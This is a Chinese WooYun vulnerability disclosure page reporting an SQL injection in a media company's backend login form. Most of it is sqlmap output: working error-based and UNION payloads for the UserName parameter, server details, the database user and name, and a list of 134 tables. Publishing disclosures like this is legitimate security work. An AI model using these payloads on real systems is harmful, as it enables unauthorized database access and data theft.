当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141687

漏洞标题:天华世纪传媒某后台存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 金枪银矛小霸王

提交时间:2015-09-19 09:03

修复时间:2015-11-05 16:02

公开时间:2015-11-05 16:02

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-19: 细节已通知厂商并且等待厂商处理中
2015-09-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

。。。。。

详细说明:

地址:

http://**.**.**.**/passport/login.aspx


sqlmap identified the following injection point(s) with a total of 179 HTTP(s) requests:
---
Parameter: UserName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' AND 6522=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6522=6522) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'Burx'='Burx&UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(115)+CHAR(101)+CHAR(120)+CHAR(121)+CHAR(84)+CHAR(102)+CHAR(73)+CHAR(84)+CHAR(81)+CHAR(69)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


当前用户名

current user:    'thsj'


当前数据库

current database:    'thsj_knowledge'


表段

Database: thsj_knowledge
[134 tables]
+---------------------------+
| Agent |
| Article_Comment_Star |
| ChapterCategories |
| DV_ChanOrders |
| Department_New |
| Department_New |
| Dv_Admin |
| Dv_Appraise |
| Dv_Badlanguage |
| Dv_BbsLink |
| Dv_BbsNews |
| Dv_BestTopic |
| Dv_BoardPermission |
| Dv_BoardPermission |
| Dv_BookMark |
| Dv_ChallengeInfo |
| Dv_Friend |
| Dv_GroupName |
| Dv_GroupUser |
| Dv_Group_Board |
| Dv_Group_Class |
| Dv_Group_Topic |
| Dv_Group_bbs |
| Dv_Help |
| Dv_Log |
| Dv_MedalLog |
| Dv_MedalLog |
| Dv_Message |
| Dv_MoneyLog |
| Dv_Online |
| Dv_Plus_Tools_Buss |
| Dv_Plus_Tools_Buss |
| Dv_Plus_Tools_Info |
| Dv_Plus_Tools_MagicFace |
| Dv_Qcomic |
| Dv_Setup |
| Dv_SmallPaper |
| Dv_Space_skin |
| Dv_Space_user |
| Dv_StyleHelp |
| Dv_TableList |
| Dv_Templates |
| Dv_Topic |
| Dv_Upfile |
| Dv_UserAccess |
| Dv_UserGroups |
| Dv_User_old |
| Dv_User_old |
| Dv_Vote |
| Dv_VoteUser |
| Dv_banzhu_config |
| Dv_banzhu_log |
| Dv_banzhu_user |
| Dv_bbs1 |
| Dv_notdownload |
| Oblog_Verifiydata |
| TH_APermission |
| TH_ArticleCategories_Base |
| TH_ArticleCategories_Base |
| TH_Article_Base |
| TH_Article_Base |
| TH_BookCategories |
| TH_BookCategories |
| TH_BookLog |
| TH_BookType |
| TH_Comment |
| TH_Message |
| TH_PersonStyle |
| TH_Rss |
| TH_Start |
| TH_UpLoad |
| TH_helpCategories |
| TH_helpCategories |
| dtproperties |
| dv_address |
| dv_sql_log |
| oBlog_usertags |
| oblog_AlbumComment |
| oblog_AlbumComment |
| oblog_SpecialList |
| oblog_SpecialList |
| oblog_admin |
| oblog_arguelist |
| oblog_arguelist |
| oblog_blogstar |
| oblog_blogteam |
| oblog_calendar |
| oblog_comment |
| oblog_config |
| oblog_digg |
| oblog_friend |
| oblog_friendurl |
| oblog_groups |
| oblog_logclass |
| oblog_logclass |
| oblog_logvotes |
| oblog_message |
| oblog_myurl |
| oblog_notdownload |
| oblog_obcodes |
| oblog_pm |
| oblog_roles |
| oblog_setup |
| oblog_skinclass |
| oblog_subject |
| oblog_syslog |
| oblog_sysskin |
| oblog_tags |
| oblog_teampost |
| oblog_teampost |
| oblog_teamskin |
| oblog_teamusers |
| oblog_trackback |
| oblog_upfile |
| oblog_url |
| oblog_userclass |
| oblog_userclass |
| oblog_userdigg |
| oblog_userdir |
| oblog_userskin |
| sysconstraints |
| sysdiagrams |
| syssegments |
| thsj_user |
| thsj.ArticleSubscribe |
| thsj.Article_Book_Log |
| thsj.Book_Comment_Star |
| thsj.Book_Log |
| thsj.Suggests |
| thsj.TH_ArticleClass |
| thsj.TH_page |
| thsj.UserCV |
| thsj.view_SystemUser |
| thsj.view_oa_admin |
+---------------------------+

漏洞证明:

sqlmap identified the following injection point(s) with a total of 179 HTTP(s) requests:
---
Parameter: UserName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' AND 6522=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6522=6522) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'Burx'='Burx&UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(115)+CHAR(101)+CHAR(120)+CHAR(121)+CHAR(84)+CHAR(102)+CHAR(73)+CHAR(84)+CHAR(81)+CHAR(69)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

修复方案:

过滤

版权声明:转载请注明来源 金枪银矛小霸王@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-21 16:01

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无